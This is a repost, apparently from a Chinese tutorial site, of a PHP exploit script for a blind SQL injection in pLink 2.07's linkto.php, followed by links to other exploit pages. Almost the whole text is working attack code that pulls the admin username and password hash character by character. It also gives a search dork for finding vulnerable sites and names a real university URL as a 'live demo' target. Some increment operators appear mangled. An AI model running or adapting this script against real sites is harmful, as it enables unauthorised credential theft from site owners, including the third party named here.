手机
当前位置:查字典教程网 >网络安全 >Exploit >pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
摘要:

<?php

ini_set("max_execution_time",0);

print_r('

###############################################################

#

# pLink 2.07 - Blind SQL Injection Exploit

#

# Vulnerability discovered by: Stack

# Exploit coded by: Stack

# Greetz to: All My Freind

#

###############################################################

#

# Dork: intext:"pLink 2.07"

# Admin Panel: [Target]/link/

# Usage: php '.$argv[0].' [Target] [Userid]

# Example for http://www.site.com/link/linkto.php?id=[Real id] 2

# => php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2

# Live Demo :

# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2

#

###############################################################

');

if ($argc > 1) {

$url = $argv[1];

if ($argc < 3) {

$userid = 1;

} else {

$userid = $argv[2];

}

$r = strlen(file_get_contents($url." and 1=1/*"));

echo "nExploiting:n";

$w = strlen(file_get_contents($url." and 1=0/*"));

$t = abs((100-($w/$r*100)));

echo "Password: ";

for ($j = 1; $j <= 32; $j ) {

for ($i = 46; $i <= 102; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

}

}

echo "nUsername: ";

for ($i=1; $i <= 30; $i ) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$i.",1))!=0/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

}

for ($j = 1; $j < $count; $j ) {

for ($i = 46; $i <= 122; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

}

}

} else {

echo "nExploiting failed: By Stackn";

}

?>

【pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit】相关文章:

DESlock 3.2.7 (vdlptokn.sys) Local Denial of Service Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

Ultra Office ActiveX Control Remote Buffer Overflow Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

精品推荐
分类导航